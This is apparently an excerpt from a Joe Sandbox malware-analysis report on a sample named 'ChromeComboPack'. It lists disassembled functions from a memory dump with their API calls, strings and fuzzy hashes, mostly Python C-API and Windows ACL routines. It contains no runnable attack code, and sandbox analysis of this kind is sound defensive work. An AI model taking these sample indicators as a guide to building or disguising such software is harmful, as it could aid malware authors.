                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Dealloc$Object_$AttrString$CallImportImport_MethodModuleTuple_
                                                                                                                                                                                                                                                • String ID: max
                                                                                                                                                                                                                                                • API String ID: 66079785-2641765001
                                                                                                                                                                                                                                                • Opcode ID: afa67af572f1350e402637108e0cfd3a2185254bb60b6e563785a36e96d5d9b9
                                                                                                                                                                                                                                                • Instruction ID: 4255017d3694272c5f5e656e118ed33dd6854f865fc6d76285699585cdbdb84e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: afa67af572f1350e402637108e0cfd3a2185254bb60b6e563785a36e96d5d9b9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0114C33B09696A2D7584F12E550039BBA1FB84F84F444075EA9D07B98DF3CE465C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PyArg_ParseTuple.PYTHON312 ref: 00007FFD8A199982
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A196350: PyLong_AsLongLong.PYTHON312 ref: 00007FFD8A196375
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A196350: PyErr_Occurred.PYTHON312 ref: 00007FFD8A196384
                                                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32 ref: 00007FFD8A1999B9
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C0AB
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: FormatMessageW.KERNEL32(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C11A
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: PyUnicode_DecodeMBCS.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C1EB
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: _Py_BuildValue_SizeT.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C200
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C218
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: PyErr_SetObject.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C22D
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: _Py_Dealloc.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C23C
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_LongTime$Arg_BuildDeallocDecodeErrorFileFormatFreeLastLocalLong_MessageObjectOccurredParseSizeSystemTupleUnicode_Value_
                                                                                                                                                                                                                                                • String ID: FileTimeToSystemTime
                                                                                                                                                                                                                                                • API String ID: 2951598573-1754531670
                                                                                                                                                                                                                                                • Opcode ID: 632d414ff01d91852ae786370b54ce0723fa11f4dcff63e83e1afd5d37ea7c8a
                                                                                                                                                                                                                                                • Instruction ID: cb8ce72a2879e244f8f5a6dad2c3538c27e90a19e369ee556f04a565e57e72de
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 632d414ff01d91852ae786370b54ce0723fa11f4dcff63e83e1afd5d37ea7c8a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E118667F19A82A2EA54EF20E46117A77A1FFC8744FC81071E64D82555EF2CE505CF00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_ParseTuple
                                                                                                                                                                                                                                                • String ID: AddAccessDeniedObjectAce$lllOOO:AddAccessDeniedObjectAce
                                                                                                                                                                                                                                                • API String ID: 3371842430-3179976129
                                                                                                                                                                                                                                                • Opcode ID: b316ed875ad92f5d67c8aa4309a6d514b86a89ca2ef25c80c39e036b3862fcec
                                                                                                                                                                                                                                                • Instruction ID: 4ac0d4b6dafe620174e0c51a017e3b4f28348b4cb55134111a800d3579750223
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b316ed875ad92f5d67c8aa4309a6d514b86a89ca2ef25c80c39e036b3862fcec
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B119A77B09B8592CB50CF51E4844AD77A0F788B90F510136EAAC83B24EF3CE988CB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_ParseTuple
                                                                                                                                                                                                                                                • String ID: AddAccessAllowedObjectAce$lllOOO:AddAccessAllowedObjectAce
                                                                                                                                                                                                                                                • API String ID: 3371842430-684429688
                                                                                                                                                                                                                                                • Opcode ID: 6cb21bfeaffb9b239cd272a1894bc0af3c1a26a0febc66c129de5451c9c9c3f6
                                                                                                                                                                                                                                                • Instruction ID: 4b21710138670dd972d8eab25b5d76b7b09b6bf20c3e84decd114ad319b3721b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6cb21bfeaffb9b239cd272a1894bc0af3c1a26a0febc66c129de5451c9c9c3f6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1118877B09B8592DB50CF51E4844AD77A0F7887D0F510136EAAC83B14EF38D998CB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_ParseTuple
                                                                                                                                                                                                                                                • String ID: AddAccessDeniedAceEx$lllO:AddAccessDeniedAceEx
                                                                                                                                                                                                                                                • API String ID: 3371842430-4150984663
                                                                                                                                                                                                                                                • Opcode ID: ad09e65bb1cea0ac4f5e9af40242ab57fcedfcdf14550f24ac85561f6cdc466a
                                                                                                                                                                                                                                                • Instruction ID: 06d11419ab7bc5b9b0cdcbca6d82cae8c69b87837df5ab47764096ec4db99a6d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad09e65bb1cea0ac4f5e9af40242ab57fcedfcdf14550f24ac85561f6cdc466a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80011E76B09741D2DB54CB64F4504AABBA0F788794F540262EB9C83B28DF3CD195CF00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_ParseTuple
                                                                                                                                                                                                                                                • String ID: AddMandatoryAce$kkkO:AddMandatoryAce
                                                                                                                                                                                                                                                • API String ID: 3371842430-3675006617
                                                                                                                                                                                                                                                • Opcode ID: 076364db2900c2bb665b33999295fa93c37af88c4ee1d99e6863dbe7ae2cd730
                                                                                                                                                                                                                                                • Instruction ID: d077f8cba94d8319b51930cc5636b702e962bad446bcf55492cca37e00dd8c0b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 076364db2900c2bb665b33999295fa93c37af88c4ee1d99e6863dbe7ae2cd730
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47011E76B09B41D2DB50CB64F4500AABBA0F788794F540262EB9C83B28DF3CD195CF00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_ParseReferenceTuple
                                                                                                                                                                                                                                                • String ID: :OVERLAPPED
                                                                                                                                                                                                                                                • API String ID: 709158290-1552635527
                                                                                                                                                                                                                                                • Opcode ID: e0bdebcfea0511a29331e8c1aae85b93b7c30f15489b0f9b8cc0108d539767b8
                                                                                                                                                                                                                                                • Instruction ID: 6b6ad76f7deb13d2582bd7c3ac5d2265062fc2f75cf43e8fcbd27a082360f7c1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e0bdebcfea0511a29331e8c1aae85b93b7c30f15489b0f9b8cc0108d539767b8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3017133A15B8182D7188F21E9A016D73E8FB99B84F956235DA8C43754EF3CE5E0C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_ParseTuple
                                                                                                                                                                                                                                                • String ID: AddAccessAllowedAceEx$lllO:AddAccessAllowedAceEx
                                                                                                                                                                                                                                                • API String ID: 3371842430-1263352432
                                                                                                                                                                                                                                                • Opcode ID: 373ec3d6942346a08b4875f32b347a83816f03fbf51c164e75df230f572021d0
                                                                                                                                                                                                                                                • Instruction ID: f742d96ca367cfdc6cba0a8a02b76ac1fa2560135b71855dd6d6c789ec5ba872
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 373ec3d6942346a08b4875f32b347a83816f03fbf51c164e75df230f572021d0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F011E76B09741D2DB50CB64F4500AABBA0F789794F540262EB8C43B28DF3CD285CF00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19AAE0: PyErr_SetString.PYTHON312 ref: 00007FFD8A19AB1F
                                                                                                                                                                                                                                                • PyErr_Clear.PYTHON312 ref: 00007FFD8A19CC5C
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyNumber_Long.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CB65
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyErr_Occurred.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CB73
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyLong_AsLongLong.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CB81
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyErr_Occurred.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CB90
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyErr_Clear.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CB9B
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyLong_AsUnsignedLongLong.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CBA4
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyErr_Occurred.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CBB3
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: _Py_Dealloc.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CBC7
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyErr_Format.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CBE6
                                                                                                                                                                                                                                                • PyErr_SetString.PYTHON312 ref: 00007FFD8A19CC92
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • Resource id/name must be string or int in the range 0-65536, xrefs: 00007FFD8A19CC81
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_$Long$Occurred$ClearLong_String$DeallocFormatNumber_Unsigned
                                                                                                                                                                                                                                                • String ID: Resource id/name must be string or int in the range 0-65536
                                                                                                                                                                                                                                                • API String ID: 286819204-907244015
                                                                                                                                                                                                                                                • Opcode ID: 8b5b059616f32ab4af3ef54f4cc1be5fdf2f8475748c73add3075f97ecde13f8
                                                                                                                                                                                                                                                • Instruction ID: 629294aaa71ee7db9bd3c9f6fe58047ec0a7a3c06f8ddc8b6b80248024727723
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b5b059616f32ab4af3ef54f4cc1be5fdf2f8475748c73add3075f97ecde13f8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1FF06823B1994295FB589F26F6643791AA0FF88BC4F885071DF4D87655EE2CE480C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19AED0: PyUnicode_AsWideCharString.PYTHON312 ref: 00007FFD8A19AF0A
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19AED0: PyErr_SetString.PYTHON312 ref: 00007FFD8A19AF29
                                                                                                                                                                                                                                                • PyErr_Clear.PYTHON312 ref: 00007FFD8A19CCFC
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyNumber_Long.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CB65
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyErr_Occurred.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CB73
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyLong_AsLongLong.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CB81
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyErr_Occurred.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CB90
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyErr_Clear.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CB9B
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyLong_AsUnsignedLongLong.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CBA4
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyErr_Occurred.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CBB3
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: _Py_Dealloc.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CBC7
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyErr_Format.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CBE6
                                                                                                                                                                                                                                                • PyErr_SetString.PYTHON312 ref: 00007FFD8A19CD32
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • Resource id/name must be unicode or int in the range 0-65536, xrefs: 00007FFD8A19CD21
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_$Long$OccurredString$ClearLong_$CharDeallocFormatNumber_Unicode_UnsignedWide
                                                                                                                                                                                                                                                • String ID: Resource id/name must be unicode or int in the range 0-65536
                                                                                                                                                                                                                                                • API String ID: 293670993-4091729669
                                                                                                                                                                                                                                                • Opcode ID: 60c3811dd216bffba4a48a67c9a17aa3425e8de53ba8c318c0d045a22ed7e1d4
                                                                                                                                                                                                                                                • Instruction ID: e841c917c3f7fcb92731773d2ff60f9ee2cdf703585b1d32f85cbf8ee38c4f02
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 60c3811dd216bffba4a48a67c9a17aa3425e8de53ba8c318c0d045a22ed7e1d4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 68F0A422B0954290FB589F26F5603795AA0BB88BC4F884070DB4D86685EE2CE480C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DeallocSequence_Tuple
                                                                                                                                                                                                                                                • String ID: Sequence can contain at most %d items
                                                                                                                                                                                                                                                • API String ID: 1991852567-3507602910
                                                                                                                                                                                                                                                • Opcode ID: 25fa632f6a6d5f12d6e8a9f938950a621ca743a84be2cca98152b4da34864958
                                                                                                                                                                                                                                                • Instruction ID: 934c8c70e6996f0418205e461e45635fd604edcc3fcb5a0956cf8dbf8ef5cc4e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 25fa632f6a6d5f12d6e8a9f938950a621ca743a84be2cca98152b4da34864958
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53F04967F1AA4292EA5C8F26A56003467A1FBD8FA4F0820B1DE5D03795DF3CE490C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Capsule_ImportReadyType_
                                                                                                                                                                                                                                                • String ID: datetime.datetime_CAPI
                                                                                                                                                                                                                                                • API String ID: 2581296196-711417590
                                                                                                                                                                                                                                                • Opcode ID: cb23a3028eaa3d179535be05a169c1506c4a61177cb4d63680d54856fd82966b
                                                                                                                                                                                                                                                • Instruction ID: 98388602cdb897b0e776f0f29b3b6fee5f40d125726b8b6dbded05cf2b222c49
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cb23a3028eaa3d179535be05a169c1506c4a61177cb4d63680d54856fd82966b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D201AC7AB06B42A1DA49DB15E8A00743BA5FB88F50F5581B6C99D93370DF3CE496C200
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Long$Arg_FromLong_ParseTuple
                                                                                                                                                                                                                                                • String ID: :Detach
